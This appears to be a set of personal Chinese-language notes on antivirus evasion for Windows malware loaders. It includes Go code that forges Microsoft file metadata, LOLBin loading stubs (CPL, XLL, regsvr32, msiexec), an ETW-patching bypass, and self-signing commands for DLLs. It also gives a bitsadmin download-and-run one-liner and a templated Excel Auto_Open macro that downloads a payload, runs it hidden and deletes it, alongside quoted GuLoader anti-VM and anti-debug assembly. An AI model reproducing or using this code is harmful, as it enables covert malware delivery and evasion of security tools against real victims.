vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Updates.xll "
vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Updates.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Updates.xll"
}
if name == "Calendar" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Calendar.xll "
vi.StringFileInfo.FileDescription = "Calendar ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Calendar.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Calendar.xll"
}
if name == "Memo" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Memo.xll "
vi.StringFileInfo.FileDescription = "Memo ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Memo.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Memo.xll"
}
if name == "Desk" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Desk.xll "
vi.StringFileInfo.FileDescription = "Office Desktop ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Desk.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Desk.xll"
}
if name == "Appwiz" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Appwiz.xll "
vi.StringFileInfo.FileDescription = "Application Installer ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Appwiz.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Appwiz.xll"
}
}
vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033)
vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200)
vi.Build()
vi.Walk()
var archs []string
archs = []string{"amd64"}
for _, item := range archs {
fileout := "resource_windows.syso"
if err := vi.WriteSyso(fileout, item); err != nil {
log.Printf("Error writing syso: %v", err)
os.Exit(3)
}
}
fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties")
return name
}
加载方式
- Control Panel – 通过dll导出特定的名称
CPlApplet以及文件扩展名.cpl,它将生成一个控制面板进程(rundll32.exe),并且该加载程序将被加载到内存中。- https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D.html
- 有导出函数时它会停止运行(x64位下不显示停止运行),然后显示不兼容信息,会显示dll版本,编译时最好连版本一起编译
- 其他方式运行: rundll32 shell32.dll,Control_RunDLL <文件名> 、control <文件名>
- 可编写vbs或js脚本调用
#!shell
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")```
!javascript
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");
- WScript
//export DllRegisterServer
func DllRegisterServer() {
Start()
}
//export DllGetClassObject
func DllGetClassObject() {
Start()
}
//export DllUnregisterServer
func DllUnregisterServer() {
Start()
}
- Excel – 生成XLL文件,它们是基于Excel的DLL文件,当加载到Excel中时将执行加载程序。
//export xlAutoOpen
func xlAutoOpen() {
Start()
}
- 参考
- https://zhuanlan.zhihu.com/p/28355582
- https://paper.seebug.org/1591/
- 打开后会显示没有数字签名
- 没加签名只是不可信任,还可以点击运行,加了签名后(签名不被信任),直接就加载失败了
- Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode.
//export DllRegisterServer /y
func DllRegisterServer() {
Start()
}
//export DllGetClassObject
func DllGetClassObject() {
Start()
}
//export DllUnregisterServer /z
func DllUnregisterServer() {
Start()
}
一些白加黑参考
- http://www.hackdig.com/04/hack-331458.htm
- https://lolbas-project.github.io/#/exe
ETW Bypass
var procWriteProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory")
var procEtwNotificationRegister = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwNotificationRegister")
var procEtwEventRegister = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventRegister")
var procEtwEventWriteFull = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventWriteFull")
var (
errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
)
const (
errnoERROR_IO_PENDING = 997
)
func errnoErr(e syscall.Errno) error {
switch e {
case 0:
return nil
case errnoERROR_IO_PENDING:
return errERROR_IO_PENDING
}
return e
}
func WriteProcessMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
r1, _, e1 := syscall.Syscall6(procWriteProcessMemory.Addr(), 5, uintptr(hProcess), uintptr(lpBaseAddress), uintptr(unsafe.Pointer(lpBuffer)), uintptr(nSize), uintptr(unsafe.Pointer(lpNumberOfBytesWritten)), 0)
if r1 == 0 {
if e1 != 0 {
err = errnoErr(e1)
} else {
err = syscall.EINVAL
}
}
return
}
func ETW() {
handle := uintptr(0xffffffffffffffff)
dataAddr := []uintptr{procEtwNotificationRegister.Addr(), procEtwEventRegister.Addr(), procEtwEventWriteFull.Addr()}
for i, _ := range dataAddr {
data, _ := hex.DecodeString("4833C0C3")
var nLength uintptr
datalength := len(data)
WriteProcessMemory(handle, dataAddr[i], &data[0], uintptr(uint32(datalength)), &nLength)
}
}
自签名步骤
- openssl genrsa -out privkey.pem 512 // 生成rsa密钥
- openssl req -new -x509 -days 3650 -key privkey.pem -out server.crt -subj "/C=CN/ST=mykey/L=mykey/O=mykey/OU=mykey/CN=domain1/CN=domain2/CN=domain3" // 生成证书
- openssl pkcs12 -export -out server.pfx -inkey privkey.pem -in server.crt // 生成pfx文件
- osslsigncode sign -pkcs12 server.pfx -in Dll1.dll -out Dll2.dll -pass 123 // 将原dll签名
Delivery
- hta
- hta可以远程下载执行,可以伪装成lnk文件
- 参考 https://www.anquanke.com/post/id/210404
- 调用mshta时,后缀名可以是任意后缀,但有的后缀
js、txt常用的后缀打开后就是一个窗口了。 mshta.exe url/文件绝对位置
<HTML>
<HEAD>
</HEAD>
<BODY>
<script language="javascript" >
window.resizeTo(0,0);
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("text");
window.close();
</script>
</BODY>
</HTML>
- bitsadmin组合
fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
- Macro
- Excel macro that will download, execute and remove the payload
Sub Auto_Open()
Dim {{.Variables.pathOfFile}} As String
Dim {{.Variables.Full}} As String
Dim {{.Variables.t}} As String
{{.Variables.pathOfFile}} = Environ("AppData") & "\Microsoft\Excel\"
VBA.ChDir {{.Variables.pathOfFile}}
Dim {{.Variables.remoteFile}} As String
Dim {{.Variables.storeIn}} As String
Dim {{.Variables.HTTPReq}} As Object
{{.Variables.remoteFile}} = "{{.Variables.URL}}{{.Variables.outFile}}"
{{.Variables.storeIn}} = "{{.Variables.outFile}}"
Set {{.Variables.HTTPReq}} = CreateObject("Microsoft.XMLHTTP")
{{.Variables.HTTPReq}}.Open "GET", {{.Variables.remoteFile}}, False
{{.Variables.HTTPReq}}.send
If {{.Variables.HTTPReq}}.Status = 200 Then
Set {{.Variables.output}} = CreateObject("ADODB.Stream")
{{.Variables.output}}.Open
{{.Variables.output}}.Type = 1
{{.Variables.output}}.Write {{.Variables.HTTPReq}}.responseBody
{{.Variables.output}}.SaveToFile {{.Variables.storeIn}}, 2
{{.Variables.output}}.Close
End If
{{.Variables.Full}} = {{.Variables.pathOfFile}} & {{.Variables.storeIn}}
Set {{.Variables.obj}} = GetObject("new:0006F03A-0000-0000-C000-000000000046")
{{.Variables.obj}}.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & {{.Variables.Full}}), 0
{{.Variables.sleep}}
Kill {{.Variables.Full}}
End Sub
Sub {{.Variables.sleep}}()
Dim when As Variant
Debug.Print "Start " & Now
when = Now + TimeValue("00:00:30")
Do While when > Now
DoEvents
Loop
Debug.Print "End " & Now
End Sub
- 宏更多可参考
- https://cloud.tencent.com/developer/article/1761344 Office如何快速进行宏免杀
- https://uknowsec.cn/posts/notes/%E5%8A%A0%E8%BD%BD%E8%BF%9C%E7%A8%8BXSL%E6%96%87%E4%BB%B6%E7%9A%84%E5%AE%8F%E5%85%8D%E6%9D%80%E6%96%B9%E6%B3%95.html
[x] 学习 https://github.com/hasherezade/transacted_hollowing 手法
- https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/
- 第二阶段的装载机,普通入口点执行无关简要的操作,用来误导研究人员
- 执行通过修补入口点重定向到核心 [x] https://mp.weixin.qq.com/s/-o1OKRDoa0E8PKe3y3x-dQ
沙盒识别
- wmi获取系统信息
- 获取cpu温度
- 不完全可行,有些物理机不支持
- cpu数量,通过peb 0x64位置
- 检测网络地址
GetTickCount返回指定值的时候才能够继续,这样在某种程度上说就达到了超时效果,而且这样的片段有好几个,有意思的是指定的返回值在经过简单的计算之后会被用来拼装成要获取的函数名称字串。
- 设定在指定时间运行,否则程序异常出错
- https://github.com/med0x2e/GadgetToJScript
- 将c#转换为js vbs代码
- 参考 https://blog.csdn.net/Snake_74/article/details/105295926
- https://github.com/mdsecactivebreach/CACTUSTORCH
- c#程序集转换为js hta的方式
沙盒钩子检测
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/
_ANTI_HOOK
fnop
pop ebx
cld
cmp dword ptr [ebx], 0
jnz short _jmp_copied_NtAllocateVirtualMemory
clc
xor ecx, ecx
_copy:
clc
push dword ptr [eax+ecx]
pop dword ptr [ebx+ecx]
add ecx, 4
cmp ecx, 18h
jnz short _copy
cld
_jmp_copied_NtAllocateVirtualMemory:
fnop
jmp ebx
_ANTI_HOOK
随着push dword ptr [eax+ecx]和pop dword ptr [ebx+ecx]NtAllocateVirtualMemory 函数被复制到retn 0x18
ntdll_NtAllocateVirtualMemory
arg_0= byte ptr 4
mov eax, 15h
xor ecx, ecx
lea edx, [esp+arg_0]
call large dword ptr fs:0C0h
add esp, 4
retn 18h
然后它跳转到复制函数的代码,使用jmp ebx并执行它。
如果它在没有钩子的环境中运行,该函数将被正确执行。但是如果函数中有一个钩子,并且这个钩子进行了相对跳转,比如带有操作码E9(比如布谷鸟监视器执行的那些),当已经复制到另一个位置的函数被执行时,它会跳转到未知位置,会发生异常,导致程序突然终止。
虚拟机检测
GuLoader 使用以下算法来检测它是否在虚拟机内:
_VM_DETECT proc near
cld
_VM_DETECT_START:
fnop
xor edi, edi
nop
mov ecx, 186A0h
cld
nop
_VM_DETECT_CONTINUE:
push ecx
call _RDTSC_OPS
pop ecx
cmp edx, 32h
jl short _VM_DETECT_CONTINUE
add edi, edx
dec ecx
cmp ecx, 0
jnz short _VM_DETECT_CONTINUE
cmp edi, 0
jl short _VM_DETECT_START
cmp edi, 68E7780h
jge short _VM_DETECT_START
mov eax, edi
retn
_VM_DETECT endp
-
值0x186A0存储在ECX. 该值表示EDI_RDTSC_OPS只要运算的结果大于0x,函数的结果就会增加次数32。
-
之后它会调用_RDTSC_OPS 函数,后面会详细解释。现在,只需要知道这个函数会返回一个大于 0 的值。
-
然后检查该值是否大于 0x32。如果是这种情况,它会将结果添加到EDI寄存器中并减小ECX值。否则它返回到_VM_DETECT_CONTINUE_RDTSC_OPS再次调用。需要注意的是,如果此时返回的值_RDTSC_OPS连续大于0但小于0x32,程序将一直处于无限循环。
-
这将一直进行直到ECX为 0,因此函数的结果将EDI与运算次数相加。add edi, edx0x186A0
-
最后,它将检查这些增量的结果是否大于或等于0x68E7780。结果必须更低才能通过虚拟机检查。如果不是,则执行将返回到_VM_DETECT_START。需要强调的是,在没有任何修改或挂钩的虚拟机RDTSC中,程序将在无限循环中保持运行。
基本上,恶意软件开发人员估计,由于函数产生的开销,在_RDTSC_OPS 0x186A0虚拟化环境中执行函数时间返回的值的相加将导致高于值。如果人为地将的值降低到以下以试图绕过类似技术,则分析将永远停留在此 Anti-VM 检查中。0x68E7780_RDTSC_OPSRDTSC0x32
_RDTSC_OPS 函数
GuLoader使用以下算法获取两次RDTSC调用之间的执行时间,CPUID EAX=1如下图所示:
_RDTSC_OPS
lfence
rdtsc
lfence
shl edx, 20h
or edx, eax
mov esi, edx
pusha
mov eax, 1
cpuid
bt ecx, 1Fh
jb short $+2
popa
lfence
rdtsc
lfence
shl edx, 20h
or edx, eax
sub edx, esi
cmp edx, 0
jle short _RDTSC_OPS
retn
_RDTSC_OPS
该算法执行以下操作:
1.首先获得在经过时间EAX(低部分)和EDX(高一部分)通过RDTSC。
2.OR在高低部分之间进行运算,并将结果保存在 中ESI。
-
它调用CPUIDwithEAX=1然后,由于指令,它检查它是否在虚拟机中运行。然而,操作的结果并不相关,因为调用的目的是生成 VM 退出,导致管理程序将执行传递给虚拟机管理器。这允许区分它是否在虚拟机中运行,因为调用比在物理机中花费更多的时间。bt ecx, 1FhCPUID
-
调用RDTSC并再次获取在EAX(低部分)和EDX(高部分)中花费的时间。
5.OR在高低部分之间进行运算,并减去存储在 中的先前结果ESI。
- 如果结果大于 0,正如在正常执行中所预期的那样,函数将返回 中的结果EDX,否则将返回到函数的开头。需要强调的是,在某些沙箱中,样本此时可能会被锁定在无限循环中,这取决于沙箱处理检测问题的方式RDTSC。
DJB2散列 计算函数hash
反沙盒/反仿真 GuLoader 还会检查应用程序窗口的数量以检测分析环境。此检查使用该函数EnumWindows枚举和计数屏幕上的所有顶级窗口。如果窗口数小于12,则恶意软件TerminateProcess以自己的进程句柄为参数调用终止。这样做可能是为了逃避沙箱或模拟器环境。
Anti-Attach:修补DbgBreakPoint和DbgUIRemoteBreakin Windows API 函数DbgBreakPoint并DbgUiRemoteBreakin在调试器附加到正在运行的进程时调用。shellcode 通过替换with的INT3操作码(NOP,或“无操作”,什么都不做),并用虚拟调用(导致崩溃)替换的前几个字节来修补这两个 API 。
- https://www.crowdstrike.com/blog/guloader-malware-analysis/
- https://blog.morphisec.com/guloader-the-rat-downloader
它从检测代码执行加速的常见反沙盒技术开始:它获取 Sleep 函数调用前后的本地时间,并检查 Sleep 是否被跳过。
然后加载程序收集受害者计算机上的数据,包括主机名、操作系统名称和版本、系统类型(32/64 位)、用户名、网络适配器的 MAC 地址。它还查询 WMI 以获取防病毒信息。
滥用windows callback执行shellcode
- 作者提供了一种搜索方法,快速搜索具有callback的函数
- http://ropgadget.com/posts/abusing_win_functions.html
待学习,系统调用
- CSV Injection https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSV%20Injection/README.md
- AMSI Bypass https://github.com/ssswake/payload/blob/aa4086b854/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md
- Mimikatz整理 https://github.com/ssswake/payload/blob/aa4086b854/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
shellcode只运行一次:主程序通过dns,http远程获取密钥,通过密钥解密shellcode执行,shellcode包含反调试和反沙箱代码,运行后再次根据密钥解密真正执行的shellcode,通过各种方式注入执行。
免杀的ABU方向 #11
反沙箱
创建一个只有sleep的线程,sleep 23s,使用WaitForSingleObject设定超时20s,正常情况下肯定会超时,在沙箱中sleep加速,则不会超时。 在代码中加入无用判断、循环与赋值,增加静态分析的难度,并针对许多容易被检测到的字符串和函数都进行间接的赋值与获取
神仙项目
- https://github.com/LordNoteworthy/al-khaser
- 神仙项目,总结了反调试,反沙箱,反虚拟机等等技术
之前使用地狱之门那种方式从磁盘读取获取ntdll syscall stub,需要调用几个ntdll的API难免涉及到鸡和蛋问题。下面这个项目则是创建挂起的子进程,此时进程初始化尚未完成,起码主线程还未创建,不会触发进程创建回调函数,EDR也不会注入dll hook ntdll,然后通过NtReadVirtualMemory获取pure stub。因为读取的是自己创建的子进程,也不会太敏感,完成后直接终止进程。
https://github.com/plackyhacker/Peruns-Fart
WMEye是一个实验性工具,是在探索Windows WMI时开发的。该工具是为使用WMI和远程MSBuild执行进行横向移动而开发的。它将编码/加密的shellcode上传到远程目标的WMI类属性中,创建一个事件过滤器,当被触发时使用一个特殊的WMI类LogFileEventConsumer写一个基于MSBuild的有效载荷,最后远程执行有效载荷。 https://github.com/pwn1sher/WMEye
杀软行为分析
杀软在 system 进程中加载了不同功能的驱动:
我们可以简单瞅瞅里面的驱动,先以 360FsFlt.sys 为例子:
根据导入表中的回调函数,可见该驱动对进程、线程、模块、对象及注册表均进行了相应
的监控操作
再外后看,像比较敏感 explorer、wscript 等程序运行时也会挂载相应的 dll
https://9bie.org/index.php/archives/796/ cs bypass卡巴斯基内存查杀--BIE实现
- https://9bie.org/index.php/archives/796/
对内存x属性隐藏,在需要时再加上x属性。打一个卡巴内存扫描的时间差。